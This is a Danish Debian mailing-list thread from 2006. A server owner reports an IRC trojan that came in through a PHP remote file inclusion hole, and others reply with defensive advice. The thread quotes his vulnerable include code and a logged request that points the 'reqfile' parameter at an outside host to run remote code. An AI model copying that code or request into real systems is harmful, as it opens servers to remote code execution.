Re: SV: Trojan attack mod min server

To: debian-user-danish@lists.debian.org
Subject: Re: SV: Trojan attack mod min server
From: "Admir Trakic" <admir@trakic.com>
Date: Thu, 18 May 2006 09:55:21 +0200
Message-id: <[🔎] 928686150605180055l680eded4ua089c84b6d24375a@mail.gmail.com>
In-reply-to: <[🔎] 446C01DB.1070205@timmy.dk>
References: <[🔎] 1407.192.168.1.9.1147889875.squirrel@swampthing.dk> <[🔎] 1816.192.168.1.9.1147904334.squirrel@swampthing.dk> <[🔎] 446C01DB.1070205@timmy.dk>

Jeg er enig med Mads at din sprøgsmål er lidt kryptisk.

Prøv og læse hints fra denne attikel
http://www.linux.com/article.pl?sid=04/08/05/203238 omkring securing
php og sørg for fopen(), fread(), fwrite() har passende precaussions
implementeret i din scripts,...

/admir


On 5/18/06, Mads N. Vestergaard <mnv@timmy.dk> wrote:


 Hej Torben,
 Ikke så meget med dit spørgsmål, men hvis du ønsker at kunne inkludere en
fil via en GET parameter, så sørg altid for at validere brugerens input. Gør
f.eks. så de kun kan inkludere filer fra en bestemt mappe, samt at de skl
have en bestemt endelse f.eks. .php, dvs, hvis brugeren havde sat reqfile
til foo ville følgende fil blive inkluderet /sti/til/din/mappe/foo.php.
 Hvordan ville det ikke være hvis reqfile var sat til /etc/passwd
 I php.ini kan du også sætte at den ikke må åbne URLs.
 /Mads

Torben Schou Jensen wrote:

 Min index.php var kodet til at lave PHP include af den fil der angives i
reqfile:
if ($_REQUEST['reqfile']<>"") {
 include $_REQUEST['reqfile'];
 exit;
}


Mit gæt er at nogen via dette har kunne udføre noget kode i PHP fra
291.133.46.212, normalt ville reqfile indeholde navnet på en fil på egen
min server, men nogen har været kreativ og fodret den med en http adresse.

GET
/%7Etsj/fun/index.php?reqfile=http://219.133.46.212/admin/html/bar?

Mvh
Torben



 Efter at have læst på din side, er jeg ret nysgerrig I, hvad du har haft
liggende I din index.php som har gjort, at han kunne downloade og
eksekvere
den fil der angives?


Med venlig hilsen
Andreas Krüger

-----Oprindelig meddelelse-----
Fra: Torben Schou Jensen [mailto:tsj@swampthing.dk]
Sendt: 17. maj 2006 20:18
Til: debian-user-danish@lists.debian.org
Emne: Trojan attack mod min server

Mandag aften opdager jeg tilfældigt via ntop en IP adresse der er fast
koblet op på min server, og det er ikke HTTP trafik, men mystisk stabil
trafik i små pakker mod port 2343.

Ved nærmere undersøgelse viser det sig at være en såkaldt IRC trojan der i
slutningen af december 2005 er sluppet ind på min server via et PHP hul og
har bidt sig fast i crontab.

Læs mere på http://swampthing.dk/attack1/

PHP hullet er nu lukket og trojan er fjernet, men jeg tænker nu over hvad
det hul kan have været brugt til, kan nemlig ikke finde ret meget info om
sådan noget på google???

Mvh
Torben



--
To UNSUBSCRIBE, email to
debian-user-danish-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org






--
 Mads N. Vestergaard | Standard Sys Admin Answer #112:
http://rwxr-xr-x.dk | "Well, it works for me."



--
Admir Trakic
Debian Gnu/Linux user #99405
http://www.trakic.com/

Reply to:

References:
- Trojan attack mod min server
  - From: "Torben Schou Jensen" <tsj@swampthing.dk>
- Re: SV: Trojan attack mod min server
  - From: "Torben Schou Jensen" <tsj@swampthing.dk>
- Re: SV: Trojan attack mod min server
  - From: "Mads N. Vestergaard" <mnv@timmy.dk>

Prev by Date: Re: SV: Trojan attack mod min server
Next by Date: Re: Trojan attack mod min server
Previous by thread: Re: SV: Trojan attack mod min server
Next by thread: Re: SV: Trojan attack mod min server
Index(es):
- Date
- Thread